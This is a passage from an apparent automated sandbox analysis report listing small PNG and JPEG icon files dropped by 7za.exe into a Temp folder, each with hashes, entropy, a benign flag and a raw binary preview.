      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=paint.net 4.0.3], baseline, precision 8, 32x32, components 3
      Category:dropped
      Size (bytes):1155
      Entropy (8bit):7.119078044384068
      Encrypted:false
      SSDEEP:
      MD5:17093623F3FB3682CD8E52C9CD5ACCBA
      SHA1:AF4DD90FBFE67D164E52C09CC9E45425CAD284B7
      SHA-256:0D5778872F7496A06CB00AFAEF7BABD410E9E231DAB34811BAB21559B25172E1
      SHA-512:119DD145383DC7CC0BA198CE41B9EFD1CCE14A6FC511AF9833F29CC0887F6504992E1AA71C6F7342BCF6C550BD41C2F76F166688AF8C7D64BD4331FD0668CF66
      Malicious:false
      Reputation:low
      Preview:......JFIF.....`.`.....fExif..MM.*.................>...........F.(...........1.........N.......`.......`....paint.net 4.0.3....C....................................................................C....................................................................... . .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........g....x'..q.x.S....E...........su.........vx....~......?.i~......*..5..\....($...s.c...B..>2....g...~.?.<A.......&.......g.d(.`:..6..>..W................I........J..W#l.&....K.).b.1+..,...9_.........~.....~*|..o...x.k.....[;...q...#.....$../.J..{g
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 64 x 48, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):417
      Entropy (8bit):7.0446338485793225
      Encrypted:false
      SSDEEP:
      MD5:60FE33DC6D8B517AAAC2EB9CAE16C453
      SHA1:C11AB1B507062F107A290B4469E5E6306CF174A0
      SHA-256:08EDB00BEF5291687C51FBF16C8819F0384BD4C38C52CEBD7A92BA490AA5C073
      SHA-512:BCBB3A55194301DE45B45E200737F2453C708A1A7992DD79A3F9C7F4DCC822A7C9D4C0977B60220A34FE90AD527B927DC9A4EBC0F74333C358E9A04A2B001955
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...@...0......K|.....gAMA......a.....pHYs..........(J.....tEXtSoftware.paint.net 4.0.3..P....IDAThC..;..@..`..!....4.q.500.DC1..b"..{.....w....a..'...m........._.<..8T.$.E]D..<OE.0..v...Xv..w@.E2..u.W.m...................37M.......G.,..i.......A_..v@..jY...:...).B.}...8.k.....e....+...m......g....5M.C..Qp]WNx.....y..3....i...7...0~'....r...O!....c..B........../X....`...(.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):492
      Entropy (8bit):7.27685678118561
      Encrypted:false
      SSDEEP:
      MD5:10F3F6CD9259EA9FEFFB5FF39A31EE7B
      SHA1:0813D934AAF7467FBF090C0D6C5885543584A577
      SHA-256:7AC5AA990BD7100172177F3B874CFCE38D605D33B7DDFE7294DEEF4B7D0AF690
      SHA-512:DD81A6BD7CC8FEBE9D1D7CD439EBFBC7D4716859F89F5A1049F2F8582B8DE40FB11EF333B8C0AAC9D0264D9C0B2EBB918E70B5F380DD76E832F145DD421DADFC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P...]IDATXG..j.@....]W.k...gt...].P..$(n..B...51.....nJ...0.\..$s..q,..._..s4.A/.~SVQ...I..c<..t:..<.1..$......|T&.......(.....t..g..Y..6.,.p8..p@..h4....`.4M..9..._..j.$.....>..'.",....}).v....6..Y.fJ.....t:..n..........i.L&< V.Ua....y...\.."...j.G.6%a.. 0+B...L...<....V...l.0.v....v.5..;lB6.9..2..|..)TYy.Q..\....f..........(F.,........p.]........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):369
      Entropy (8bit):6.9089624100460645
      Encrypted:false
      SSDEEP:
      MD5:19CAC43CA714FE6AB0610BCFAB5A7498
      SHA1:D6ABEEFF66CF578A2109039FD29C3E8D57F5F336
      SHA-256:3C21A0AA94EA7B5F77D39D6ECD208370CA63F26D77C15FBE9EA40C7F31CCB052
      SHA-512:CC437423837455EB5F8301458EC786442AEA29263C24F5E3988D246B3000D35CD2B945DB01C2AB7CA0D9CDF78C3F5576066F104F8AEAAA10AF3360E53CB2AA0C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P....IDATXG...0..-}.B..A..rP..E'.Q../. ...Q9MB:um... C..|.?...._..B._..9.i.8..#1.......q.X.I8..{...M. ."...4Q...i.....V..\.,..)...`....xc.6[E].r.h'.0..^U....#@.I..y..x... ..m.,..?.X.4...p.#..q.....(.$...H.T...}..<..P(...i/.....7.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=paint.net 4.0.3], baseline, precision 8, 32x1, components 3
      Category:dropped
      Size (bytes):742
      Entropy (8bit):6.392295718495316
      Encrypted:false
      SSDEEP:
      MD5:8BBCDDCC9D2076E6A835C041F5FF1CFE
      SHA1:206B50C32F466755BF6764C62951BEAB8068575D
      SHA-256:D9E8EC40D3B8CF2C0FDDBB9ECFA886AAA9AB4A13FE0E9E68D22AA1BC9E4445A1
      SHA-512:6CA1C14D5675D92E47CF79FCD9B23181C280A01F8F4E75B40A24BE14842A02C5A2A404A4DD64EFDFAC22ECE8DF49E48412C89F50A686A925C806B6587C696B00
      Malicious:false
      Reputation:low
      Preview:......JFIF.....`.`.....fExif..MM.*.................>...........F.(...........1.........N.......`.......`....paint.net 4.0.3....C....................................................................C......................................................................... .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..^.(..3..(.....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=paint.net 4.0.3], baseline, precision 8, 32x32, components 3
      Category:dropped
      Size (bytes):1145
      Entropy (8bit):7.096126858606008
      Encrypted:false
      SSDEEP:
      MD5:A2A0638727C370A57415DCD22C6CF48A
      SHA1:0B758C62EA86AC10CC9D03281A8E1D8C576F085C
      SHA-256:68F4DB5C1AEAEFEAE94D1DB7DC0F481DF7AF111FF1C2B3FB9056F3A20FE12311
      SHA-512:77A21C4698612D27154B5CDF370C032F2AB9B9196E5E013F2E24CD68AE3424AE18D0E1AF916EA19C956E0FC4800A8B2112545E7B3C47C23DD726F5A35F4ABC3E
      Malicious:false
      Reputation:low
      Preview:......JFIF.....`.`.....fExif..MM.*.................>...........F.(...........1.........N.......`.......`....paint.net 4.0.3....C....................................................................C....................................................................... . .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....t+....6.~.ey.j......4.z*".....j..>.x.....t.k...%K}N.[I].@p..m.i..2.}!...E..T....|......K.Zh.../.lZ..y..Yw.r7... ................O..-..d......>....YjsIr..D..>....V.K....)9...Q^../....3.k.?.%....V....Y.),..-.i.Z..E..."...?)ppv...9........+.f...'.mr.U..t9g70..x.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):279
      Entropy (8bit):6.91616340718266
      Encrypted:false
      SSDEEP:
      MD5:E98E1D1C14C6AACB40287732779F6769
      SHA1:C8731540EE117B9619BA024E3B80FB82E7DE6534
      SHA-256:AD62ACC152F45BCB712E983177946BFC28CE65DF6DF8B8AB037C8A9A1D1E9680
      SHA-512:01D4B399994FFD565E6603C90C40A2CC176D768BF62508F97369CD406742C95AED74D33A1AE837A6D1F460AACA7F26713340761CB21075008E4462FBCA750CEE
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....IDAT8...1..@.Ew.X.x...z..!.. x..d.^....0...Q....L.g0.f`.?o'?.I"1.w...c.p4xB~...s.A%"........=.?=UFM~.D.5. j....4=G..gM84cT9.v`jz.|5].gb.S.oa.2ej.F..^!..|...A.[5....R........H.(:...h.]...i@...~Ok..k... ).1.=G..gM8D.b......@..I.3....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):576
      Entropy (8bit):7.408405165164679
      Encrypted:false
      SSDEEP:
      MD5:077932CD1EC68072A38EB969F5A840ED
      SHA1:908614ED1A5853CFC2CC0170B474F3F0E5CF8344
      SHA-256:0FE615B0E109626D2A6599CAFF2E042723683096E6FB5E06D47ABF69F6CCC499
      SHA-512:0FC86DE9FA5210DA0473286A35EC7449B7964ACA901E0D00CD151110E8AD303D8F23333F0734955E38838DB4F4099F0F48994E60330C545F5387E59BF227F271
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P....IDATXG...Q.......K..."<(I.xQ.=)..E".r..;..P..2s..i.j..=......h....S.N'..4*...."\...O....E....p.q...x<p..0....._B..(...z.J....=..5Z..|>..v;......)6..j..;.Z..J........0..e..z=v..!g..:...9....`.n...I$.Q. ...x<".....V.<... b..r.6...P.m *:Zq"..+..(O. .n...x<.p8...$k..l...Q..F...3.,..h..V.cp....d.N..\..b..G..^........6...>.VC.(..r..#w...:..4..Z..^.p.r....cz/...d2,.....l.[u......l6......tbW..37.z..f\.......P(..V.........F...z..7O......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=paint.net 4.0.3], baseline, precision 8, 32x32, components 3
      Category:dropped
      Size (bytes):1211
      Entropy (8bit):7.220000681598473
      Encrypted:false
      SSDEEP:
      MD5:8BE766B6613B7D0A0D4CAC4AEC81347B
      SHA1:4DC5AC0CE79401DFD7B15327796A85BC0B781292
      SHA-256:C676BE84BCEF292D2D54B2FE4C103E01C3103EF1C07BC75776B12864AC06D706
      SHA-512:80F7FCA76FA87053CE1E84B5E42F02A45AAC50F1B8E7F614EBBAA5C28C0A2E6DE7324FFC1A4E5CA0055F33C5AE4AEBF5C6A4DEC266CAF380A4767D007BFA4983
      Malicious:false
      Reputation:low
      Preview:......JFIF.....`.`.....fExif..MM.*.................>...........F.(...........1.........N.......`.......`....paint.net 4.0.3....C....................................................................C....................................................................... . .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?............Y.J.W.|..}....&.......\.'..z,j..;.........o........<;....^...2O.k.lc...5.&g|!e.%T...r3......../...||...].&.....O.o..[............).q7,...`.,T.......>......._.=a.M._..V.m....&..*...G........._......u....;...Z...>*.`.t..0G..M"..,H.70....$.3_.7.I...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 64 x 48, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):479
      Entropy (8bit):7.246193841988349
      Encrypted:false
      SSDEEP:
      MD5:9BB356DAA68302A9150E7CB0B4C8F950
      SHA1:5C1B94F0853E30898EB52A022C46AF151C032564
      SHA-256:5733D21ED1B8E6FD37DC4ABAC125B2AA1954779FE4328EC9218516F2A5864A97
      SHA-512:5B7E3F31CDB28787E14706A7FA854730E5044DF8094BABFF4DA72160C82D867778B0CD07150A2868545002CAAAA7DA166C2EF508BCF803C96571B29EB021DBFF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...@...0......K|.....gAMA......a.....pHYs..........(J.....tEXtSoftware.paint.net 4.0.3..P...]IDAThC..;.@..av.2.)...=....B.B.Z..,.../...2.N..Y..9OB.t.7.EDDDDDD..\...>..Jt]' .C....a.d.j.2+.x<.p..f.1o.#..|.!.f.?....b.X.;..c....G(..<..}..V..x...........W.'........@....C.x..M.._h.V.b...D....g........z...v...e.I}S[~...{.)Xy@4....4.?^.....#V.~..{.'I..<>c*z,."..........M.E!.wv.].}_.x@..8.m...d.z.6#.N...\..].cV~,.c..N..........W.............IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):397
      Entropy (8bit):7.065696605829585
      Encrypted:false
      SSDEEP:
      MD5:17F7764A320981FC6E7AAF0CDAD5DF6C
      SHA1:4EFA2CCE1A817F792DDF683704F5625D9D04242A
      SHA-256:6F4524FE5FE488841E7B097FBA730C5F3720B53818118AE1506BA64B87C448DF
      SHA-512:A8F5828F6B22A46E6189E1194D9682B1BFF8F7DDF898F1700A7C346C1847A5B9335D900D322C0C465EFF12460ECA4C697E007D45B2C1DAE26EFBC18C4BD5B905
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P....IDATXG.9..0.Esm........!...;.....L5.iF~R....;N..(.....5MCy.S..E.].d...q.m.l....q..X..!.,\CSU...W...|...7p..Cd..{.e.....)MS*....ZQ..a..$IdL`.Q...;..10..5...n.x.chx......}o.Y.3...GA.....Y.Y.b..u.?G.,.....j.G......bw..yT....H.%8....C.+..(..a.....k.;.p....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 64 x 48, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):525
      Entropy (8bit):7.262242280039172
      Encrypted:false
      SSDEEP:
      MD5:A0BEBB7B8A8D5BEB04615565A82495CA
      SHA1:2E0B3148832E5A15C0232AA8B445E1BE6B4D1B19
      SHA-256:90F432978EF01601646764EF3D57F88F82EEC63CC5E71DAED81F4CDD82AB5EBB
      SHA-512:C1B4DB40A814F16F5859C3D26D11FB1F589EC87543BC1D8E26FEF20955385E31D40F87917DFE7D6B3845593547A411A0A21832093072FB4A75A82207A80CC690
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...@...0......K|.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P...~IDAThC..K..P....V......w~....i.d.U.......8...00x..@...9.5..........eY&.|>..".n.^.yL}=.....2..e6...|>.v:.j..aq.....c... 1.V..p8.._.$2..~...r.$I.(.oF.5..a~....n7].L..f.)...a_..P...B.V..K......"W...N..E....&.).@...2.Ld.X.f.)...}.9Q....^...p.G<.n.+...I..j}J...........v.....[c....r...o.x.D.8.cm..E0...PGD..V....]E@Rx..n.._.|>..X.v....8.N..Z7.4...j.^w.....i@DDDDDDD.....8..<.[K.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3085
      Entropy (8bit):7.914212086321928
      Encrypted:false
      SSDEEP:
      MD5:4E19EBE0347EDBA87B65E54661BFC9C4
      SHA1:775ED376D87019EF8C2A128A03829D162F785830
      SHA-256:A212690D2BF8758E181B6B916A0FBFE0075A32AAEA0B4ECE10CC3D7BCF170EBA
      SHA-512:38D29CFB3B0B4C8D1253830BC5989ABDBA7E60CAAC75895A7664C14A24FCD463C3F1381FCA36750220F25CD7FE70711BCB36C98810EAE60956DAC35AB7C842F9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..[.pT..>...$..&.."."-%".....C.2VF...$..hKg.:-e.."Q...8.C.V.AL.R.).*`..*.mi)....".N..&.=.....M.f...)gf......w..?7.]..Z....xo......W.~.`..s^...p)..q..K.".kbR...7J&.l......3...U......8.$..........{+...C_..x..!_f...2&...J..p.l......O..l...3d.....I.Z....^R.:..w).....a.~.e.R.F).....o......`<..\."m8._.9sv...mL.......pGAs..d.i./.n...8..`S,.n.......y.n..&.U..ss....L...].....A........W6..}."'a6-.%U........F.J..Z.d..u...)=U:...e_...t.k.@..H9....?..|......pe....>...MJ`.:G..F........L.k....W8.:....Gr.d...N.+w.Di....}..I..7`N^O...{.....t7PZO......n.b4..H...R.9.r.k...&.|.K'......=..,...-w.=..J.......s...p)uj.1!~\W.]....._..>.\.Zz.....h].wQP/....Puf.Csn...BZ....ue.w.Ya-Jq.rO^.j..ZW.r.@?.z.....<...`cp.Q.<.t...k...0fH.xiu."...I...._..%..O...\..S..'.v.|.....Xv..^\..{qeX...-w.*.?...E.!..K.....a.}.^.eYl..c.X....`..u....X...S.[,P.r.#.:1..{..X........m.w.&..../.j.....B.v.~nx...O)?..#.N(..d.O.h.r....t.Q]....NWq,t.b...X.'.m..[
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1422
      Entropy (8bit):7.825086386190353
      Encrypted:false
      SSDEEP:
      MD5:3CB28F4A0F692A33D5FD02C4DEDF034D
      SHA1:E5339C4ED324B833F244D27C075AA89433326E54
      SHA-256:C572DAC5CE9465A7E47FED145C6AFC9485C671555BD20D9590680257AD2379AD
      SHA-512:612D9F8B02E562C6424CD36A17BC19295F82CD67F800D8F72D110C80FAF2D8B871B2F1E5CDCC5CD151E71AD75E44CB8CFDD4A89C394669DF3814A7A1545FF85F
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...6...6......Ej.....sRGB........HIDATh..Z}L[U....G[.e.......A%...h.....%..C.....8.1!.D..d.......Z...c...Q>.2.c6...d...m.>.w<.......7.Mn..{...s...WB.)o......[ o.y-@.....*... [.%..,.@...t..#.[|...#....R :..z.m?j...20.@.Y..3JI.....sq..F..3|.V.d'..7..........L2......WT.M.B./..#D[.........i...2[[...P..+.4f..af#..}.6..K...7A.`-G#..JN%.....m#..+k...i......;.3.K(.......Z.p...cY......I....e.:..0./....W.?.aG.k?...H.?.R:J.u...,!.........#../.....)e?bl...8a.S..8#..$L...TX...q.5.qc......T>..o..BW.....1.f..9...V....m..i#&..!..@[..(.s.i..8...Bp...%...nS....O.r`.....8....g...e.G..:t/N....eh.'.{g7..0....ckM.%....X...".2...%.....Y..L.-.U.....:L..b4..Y..NH.(u...[j.*+.,.]Qfp.?.Ie)..1...XW....f.L..>2...@...P*...FG..\K...16.).o9<..bQ6....D.~...tu.g.R.................#.M....Qt.'Cn.~.3S)bL%.=.|........,w....(K.........f...P2o.&.T..qnoaI..x@6OE.h.//u. -..][.Q.#..d.I...K...k.0...q..S2.....J....B.O.I.R...5..\.Nj..........:.<.e....ORxL........PU
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1560
      Entropy (8bit):7.8689628944940155
      Encrypted:false
      SSDEEP:
      MD5:1EBF12B445F5DDE92D91DDBCAF050E8C
      SHA1:74A89679DA4386EF6828F206C851912A81704585
      SHA-256:76D9EEFFC30BAE2E5F63CB0021ADA7E69EF3619077B1E7C825409B5EBBD0A222
      SHA-512:4D888F779515C5FF5CE0145F2D7021F16F67F48A132024D2CC5B616E39CF88111F1191736B34AC19B98E71D109B3BEAA6A25FC0455DCA3FCA0FFB2AF1D36387C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...<...<.....:..r....sRGB.........IDATh..Y{.TU.?.c+;........"z..;...T.E.+.....JJ#. ....K.mw..G.".pv.$6!..P...I............{......1.;....}^w.HZ..$.I....P\.6t..C..C..U{.O?l..}8p?Y..I.......u.;.....zmO{.{'-*8.. .....D....jt.D..F)...,.<......k.j|....nD..$)/........jy,...\.v...&.cK.96\.....S..c...M.........x.z.HM2|..".K......Gj.......S......t............].x.,f%v./5M.O.D+4.,~%..h.nJ2sY..m.|b..C9..=..W...Q\.rI...P......0.+.U\.<.R.tFv.f.^A..S.#^..X6M^<Ai.9.FF..v.........~LD.D....Y....u.4.K.p..........S...VC7:..U\H...|..#4k.7n)>....&...t.]".o.X...G2.L.'..%~.5... .z<.^...ft...R0..84.i8Go.r.:...5|....."....,..B.'...aA.M.r....0.5;,..;.......!p...j....&.tc.w.dw......A}...f.`.......g...u.nCp<..._.oK..%..j.F6B..2...4_R(...>.......X..{.6..[..y.+pxv..U.%....8.5....6.22:...}...S^B5..:%.e.e~.....2o..B..[X\c....V..&{....._.6).._I....Y.&...P.........y..c.hiH.l.1:.m..A0.5Mp.p,.@y..;u*.k.......[..Z%..x._>....P...q..&....y.z.....j..u..v"..;.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):4098
      Entropy (8bit):7.942977065884877
      Encrypted:false
      SSDEEP:
      MD5:2457255D805C05924665D61571822EEF
      SHA1:76C0F445DB820FA6024BE156CE1C1152B020B615
      SHA-256:B9889A7856053C884630594B2EBDD5653A01102DB4CCB03B8ADD81AF291C55B1
      SHA-512:2F30A6BEF5DA176F1ADEC8FDB0A6D40E39104BCD0DBFB0FB2AB817C48DAB1F389F3A297077508B006A7E1FB7959167EB65930755F8A3578FEE173183DF9C8D39
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..Z{t.....o7.....!.EA.)* ".l..B.7B.|!*.*.(...i..G......<L.h....Ev.../DB.....!...d....../.H.$...3w....;w..c..s.:g.s.:`..-.).jy..n.._..b..R.9g.R2.1..H.`..rnn.2......;..|.U..Q...+.>.U.'...y...........3.oa..g.G.%.h..drqm..#.D......\V./.i.I2>..)...H......c\..[Z}.....'..]<U......=k.i.l....9.m..........qY@....O..SZ3.s.%#e..r:c..M...b .4..'X2..&..&.Ao~.?.R..).H.M.sWT_!.x.....S)e.&"K.0...S...^.+..e..Q.n.3./.P..3..9...0&s&...8.&.....i.).........vwI...$|.m..1.UA.|.hU.7...?1.g..Z....w.....{3&c..n...X.Z..-I.N.........].&V...)H.i^.4a.#..LOv...A..u...w.|.{6..,.....?..K.lM...s......tU...0.u.i[,.p...K..F.......&7..MN{=R.5..[t(.....0B+..R}...fUj....."3...../.|.Y.-.75...a....Tu....6._;%.B....z.....x...q..w......Z....".ZiwF.GMA.....k.vT.....E*S.$\..x..k.26...XXK...0.%..(.......@...c...grKk..in.o..b5Oq...=}v...4...|.#.d.xEE&&.&...)o......'.V..rq.{...&.."..!3 'i.T.6..{...&.-.Ze...s!,s2M.6_A...t..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1986
      Entropy (8bit):7.875111814329764
      Encrypted:false
      SSDEEP:
      MD5:3E941E89B32094C5E67ACA12C156C1C3
      SHA1:7B2F0BF0295D523547C14C89D4262E864418AC66
      SHA-256:B27240A17218775D4C30420C662C1E1EDB31E5677D88671FD204F724EE413EAC
      SHA-512:42C7F33F40691B712F288459C385B675A93A3BA10310560B32D6E54FB34253D85D84FE2C15DF91C046EBBD3A8083D11F992981120EEFD8A321038F04370FBF74
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB........|IDATh..ZylTE.....mi..T.r6.B.Q.. .....).Q[....D.DM..........1..=.h..G0.."r...AD9$X.B...zl.....}.tw.ng.4v..|3.]....P_....6.w....!............y....C.Tb...R._..^H7#s....>..V.1...a.iy.w:(3......a=.K.BqL.3.S....i.H.Nb..c...1.#.c~..u...t..{s..8.c...HB..66f.ro.......F}.`t.x,..!t.#..Qz.f..{>.....w.n....n.8W\.S]...D.$S.1t.!....~&.;...R...`...;m.w0..J.........G+o..*..P..0.5kH:.CC...@....6.M8.l.Y3...nFiO.8*.....+.7..Q?..>..^...,.Qg...i.u.T:...{./GK$Zcoh.....\'..O{..k..^.......O..A.......5.,7..p.n.......`..[....?%.J..-...W.....m.`U.....<d).[.&|.T..-..h.6..|Eu....^.2...o..m....p..-.H........6+..5...%......K..}..._W.Yo.4.K..<9.5.....O)#..^..`]t...Q.s...\.[S....K..3x3|`TDv19-=?.aC.;.X.."...{2.q.E.'...K.ls....'.....C..,.0.S...O........E..t.S...`..@..#z....qta...42..'Vy.."d......(h......[W.~y.7._.....Q...m...+/..U...Y.....u]...Yo2.r..*.BX...a!_..S.I.....L.k.]cl<.h%\D...c4R!...u.^'..>......?.....].|.....q
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1924
      Entropy (8bit):7.883183423773459
      Encrypted:false
      SSDEEP:
      MD5:A1F2AC89720514468990B530B6F2AAB1
      SHA1:88F904A9C7233C17A71ABB9D5151C5A8D6C93470
      SHA-256:C03D570E970FB0757C5BB42402F32192C64743FAF645E4F5498A2AD18026E100
      SHA-512:2F311AE0A267C0D953AED9E6AB17659F9931992345B6962C8C646CAA5C16536478AE34DAF5515BFF62243866843F81123F27D2C95583D5CFEDA5F04CCEA8C7DF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB........>IDATh..Z}l.E......W....bE..j.G.1.....W@..H..&$..4V.$.F.6..-=P.`BD. .6.h$..(.5...h....v..,..>...]?.Mr.....{3;.....J)..,..@......P@)..e\..T....s.F..%N...oB..(........./Y/'[.../.jvXL..0.#t.....2..........Cu+.W.m.....\.i....@K.8.@..I.!].......K....`. !.].......zr1z......;.0.e...Y$DV...q...1:..3.L....y..r.2[.^{,uq./.}m.`.|.&....(.+;J..P..s;...../..t.9.R.C.f.>..ia}|2c.}n./a.......H...{`.;...B..%...-..a-...v....t...2V.)A.2.m.]j.:.:.4(.s...&........E..Ujm}......`......_.(-..1Z/...n.A.l.).%....mX.[x.c.{...x....\"{....,.B.P_'B.X[.,..T.W.c^.YC'1T..u....Ck...5....,+...l.,.I..L|5g.......&\.u..j.......S.3#..b5x..BlWv=...\G}=.....='K..zt..K....&".QJ.AYS...a...,.....c_C......6.3..[.z...~..xv.S...bm....$d..H!.-F_.-.._/..}B.!D..b....f;3>..5.!.&..t.o..v.o..HZ[.S..E..D.Wc4..M.3...MS.X..o...O8p..Dm.at.v.;7.f.3..?.p.......}.^b1o...#......0.........(u.%..x....0......9.....pY.....=\....G.2..y...xd..W.BN....X..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1675
      Entropy (8bit):7.855088144621099
      Encrypted:false
      SSDEEP:
      MD5:B04E97E27E981C356C129D67E8FC89F7
      SHA1:6CB01913E03DAF7351A53CEA0653793C8A51A959
      SHA-256:57A2AA773BBA76F2B7691CEFA87981E694A151273EB61F4492ED37AB9D09B511
      SHA-512:2880519D6190B0575F813BBC8FBA3A8742020C721FA688207A128525E3C0BC81FC54A9B53D09E5B3D3CD6A82ABD5CCD3FF6AC09036FB9A1934504904CCAED2C2
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB........EIDATh..}l.E......-..h.`....V..%(.].......^AKHT@.S.......1.........5..Q..kk.J..$..hPD.Xh....<..u....k...N..o>..ff.|..0...-0..#.. ...X.t..<.`J.<...v..h........>-z.7.b.z.......UVHi....V.........X^.%.U:CK&`pwq1.n....[.....E.HO..Q........V..&..O......xM.l.=V....L.FZ..6D......D.s........n....R....)Y....S..-L...6pk.H.mC]'...!..*../.".V.......q0......y.....9.S[p..NB.......\.......]...S.B......;Dh'..v.B.A./S.n1.^....f..H....T./.V..x..>.,..^+70&....I+.V%[c.&$.Kl"...L..............x[[.....dg....P.%#n.....0..\..C....f..G.F...BA.7.1...R..Ql..}.u..;.+f%s.7'.*....F[<.Y....3..C.7.qU,.B]8K...u..?..}l.-;..7O.Q.d..p.=...!..u......P.Ur....|.....8?...W.[q......>.|.........\...x...N..c../w-.....k./..k._.../Zx....#...#W..[...A)9...}..../Y.t..l{m.x.C.V*h*v....o.&'....u4.*..!..X|.{....8..C'0.2...5i.-..F..l..e...SZ....sZ..D....i... 2LJ'c.P.&..<{..."c.H...%....5..R./.._..]g....-g....m.i,.....Y......-x...........
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
